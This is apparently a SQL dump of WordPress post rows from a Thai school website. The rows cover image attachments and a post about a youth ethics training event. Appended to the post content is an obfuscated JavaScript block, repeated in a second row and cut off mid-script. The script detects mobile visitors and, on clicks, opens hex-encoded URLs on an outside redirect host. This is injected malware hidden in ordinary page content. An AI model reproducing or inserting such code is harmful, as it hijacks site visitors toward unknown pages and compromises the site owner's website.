(1123,1,'2024-09-06 08:59:38','2024-09-06 01:59:38','','3937_0','','inherit','','closed','','3937_0','','','2024-09-06 08:59:38','2024-09-06 01:59:38','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3937_0.jpg',0,'attachment','image/jpeg',0),
(1124,1,'2024-09-06 08:59:38','2024-09-06 01:59:38','','S__69656585','','inherit','','closed','','s__69656585','','','2024-09-06 08:59:38','2024-09-06 01:59:38','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656585.jpg',0,'attachment','image/jpeg',0),
(1125,1,'2024-09-06 08:59:38','2024-09-06 01:59:38','','S__69656581','','inherit','','closed','','s__69656581','','','2024-09-06 08:59:38','2024-09-06 01:59:38','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656581.jpg',0,'attachment','image/jpeg',0),
(1126,1,'2024-09-06 08:59:39','2024-09-06 01:59:39','','S__69656589_0','','inherit','','closed','','s__69656589_0','','','2024-09-06 08:59:39','2024-09-06 01:59:39','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656589_0.jpg',0,'attachment','image/jpeg',0),
(1127,1,'2024-09-06 08:59:43','2024-09-06 01:59:43','','S__69656591_0','','inherit','','closed','','s__69656591_0','','','2024-09-06 08:59:43','2024-09-06 01:59:43','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656591_0.jpg',0,'attachment','image/jpeg',0),
(1128,1,'2024-09-06 08:59:43','2024-09-06 01:59:43','','S__69656596_0','','inherit','','closed','','s__69656596_0','','','2024-09-06 08:59:43','2024-09-06 01:59:43','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656596_0.jpg',0,'attachment','image/jpeg',0),
(1129,1,'2024-09-06 08:59:43','2024-09-06 01:59:43','','S__69656598_0','','inherit','','closed','','s__69656598_0','','','2024-09-06 08:59:43','2024-09-06 01:59:43','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656598_0.jpg',0,'attachment','image/jpeg',0),
(1130,1,'2024-09-06 08:59:59','2024-09-06 01:59:59','','3923_0','','inherit','','closed','','3923_0-2','','','2024-09-06 08:59:59','2024-09-06 01:59:59','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3923_0-1.jpg',0,'attachment','image/jpeg',0),
(1131,1,'2024-09-06 09:01:02','2024-09-06 02:01:02','<!-- wp:paragraph -->\n<p><strong>วันที่ 4 กันยายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกับ องค์การบริหารส่วนตำบลโพธิ์ จัดกิจกรรมโครงการอบรมคุณธรรมจริยธรรมแก่เยาวชน อบต.จาน ประจำปีงบประมาณ 2567 เพื่อปลูกฝังให้นักเรียน มีคุณธรรมจริยธรรม และจิตสำนึกที่ดี และสามารถนําความรู้ที่ได้มาปรับเปลี่ยนทัศนคติ การดําเนินชีวิตเป็นไปอย่าง ถูกต้อง ตามหลักคุณธรรม จริยธรรมของพระพุทธศาสนา โดยได้รับเกียรติจาก นายประเสริฐ ปาโต เป็นประธานในพิธีเปิดโครงการ</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1109,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3923_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1109\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1112,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3924_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1112\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1110,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3925_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1110\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1111,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3926_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1111\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1114,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3927_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1114\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1113,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3928_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1113\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1115,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3929_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1115\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1120,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3930_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1120\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1116,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3931_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1116\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1119,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3932_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1119\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1118,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3933_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1118\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1117,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3934_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1117\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1121,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3935_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1121\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1122,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3936_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1122\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1123,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3937_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1123\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1125,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656581-1024x576.jpg\" alt=\"\" class=\"wp-image-1125\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1124,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656585-1024x578.jpg\" alt=\"\" class=\"wp-image-1124\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1126,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656589_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1126\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1127,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656591_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1127\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1128,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656596_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1128\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1129,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656598_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1129\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จัดกิจกรรมโครงการอบรมคุณธรรมจริยธรรมแก่เยาวชน อบต.จาน ประจำปีงบประมาณ 2567','','inherit','closed','closed','','1108-revision-v1','','','2024-09-06 09:01:02','2024-09-06 02:01:02','',1108,'http://pakhaeng.ssk.in.th/?p=1131',0,'revision','',0),
(1132,1,'2024-09-06 09:05:14','2024-09-06 02:05:14','<!-- wp:image {\"id\":1133,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/32-2567-724x1024.png\" alt=\"\" class=\"wp-image-1133\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 